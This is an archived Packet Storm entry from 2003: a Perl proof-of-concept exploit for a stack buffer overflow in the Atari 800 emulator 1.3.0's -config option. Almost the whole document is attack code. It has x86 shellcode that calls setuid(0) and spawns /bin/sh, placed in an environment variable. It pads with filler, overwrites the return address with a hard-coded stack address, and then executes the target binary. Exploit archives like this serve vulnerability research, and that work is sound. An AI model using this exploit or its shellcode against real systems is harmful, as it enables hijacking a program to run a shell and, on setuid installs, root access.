SynAtari800.pl

2003-08-05T00:00:00
ID PACKETSTORM:31487
Type packetstorm
Reporter OpTiKoOl
Modified 2003-08-05T00:00:00

Description

                                        
                                            `#!perl  
  
########################################################  
# PoC By OpTiKoOl, for Atari 800 Emulator, Version 1.3.0  
# based on   
# http://www.securityfocus.com/archive/1/331518/2003-08-01/2003-08-07/0  
# -  
# This PoC triggers a buffer overflow by passing an over-long value (> 250 bytes) as
# atari800's -config argument: 250 bytes of filler followed by a 4-byte return address.
# As in the advisory there's other bofs. but i just researched this one to  
# make a Proof-Of-Concept Code.   
# In Gentoo Linux (the distro this PoC was developed on) atari800 is not installed
# setuid, as far as I know. Without a setuid binary a successful run only yields a
# shell as the invoking user, i.e. no privilege escalation. :D
# -  
# Tested against Atari800 from portage.  
# OpTiKoOl@syners.org & OpTiKoOl@psyfreakz.org  
# -  
# Big kiss to Neuza ;* ehehe The Buf Smashing The Stack! lol  
# and a fucking shout to psychedelic ppl, you rockZ!  
# Stay Fresh!  
  
# Print the PoC banner (target, author addresses, date, sites) to STDOUT.
# Takes no arguments; returns whatever print returns.
sub head {
    my @banner_lines = (
        '#####################################################',
        '# PoC against Atari 800 Emulator, Version 1.3.0',
        '# by OpTiKoOl@syners.org and OpTiKoOl@psyfreakz.org',
        '# 02/08/2003, CopyLeft by OpTiKoOl ...',
        '# http://www.syners.org/ & http://psyfreakz.org/',
        '# -',
        '# Big Kiss 2 Neuza ;* Chuak! Chuak!',
        '#',
    );
    return print join("\n", @banner_lines), "\n";
}
  
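# this sc was ripped from a fake (trojaned) exploit...
# but this is a real shellcode, so enjoy :D
use strict;
use warnings;

# Linux/x86 payload (53 bytes, no NUL bytes so it survives as an environment
# string): setuid(0), then the classic jmp/call execve("/bin/sh") and exit().
# The setuid(0) prefix only matters if the target binary is setuid root; on a
# non-suid atari800 it is a no-op and the shell runs as the invoking user.
my $shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"  # xor ebx,ebx; mov eax,ebx; mov al,23; int 0x80 -> setuid(0)
    . "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
    . "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
    . "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

# Overflow layout: 250 bytes of filler (the advisory's threshold is > 250
# bytes) up to the saved return address, then the address to return into.
my $filler = 'SYNERSOWNZ' x 25;    # 10 * 25 = 250 bytes

# The shellcode does not live in the overflowing buffer; it is handed to the
# target through its environment and the return address is a hard-coded
# guess at where the $SYNERS string sits on a pre-ASLR Linux/x86 stack.
# Any change in environment size, kernel stack layout or ASLR moves it, so
# expect to adjust it (e.g. from a core dump) if the target only segfaults.
$ENV{'SYNERS'} = $shellcode;
my $ret_addr = "\xad\xff\xff\xbf";  # 0xbfffffad, little-endian
my $buf = $filler . $ret_addr;

head();

# List-form exec: the payload reaches execve() as one argv entry and is never
# seen by a shell, so the raw 0xad/0xff/0xbf bytes cannot be split or
# reinterpreted. exec only returns on failure, hence the die.
exec('/usr/bin/atari800', '-config', $buf)
    or die "exec /usr/bin/atari800 failed: $!\n";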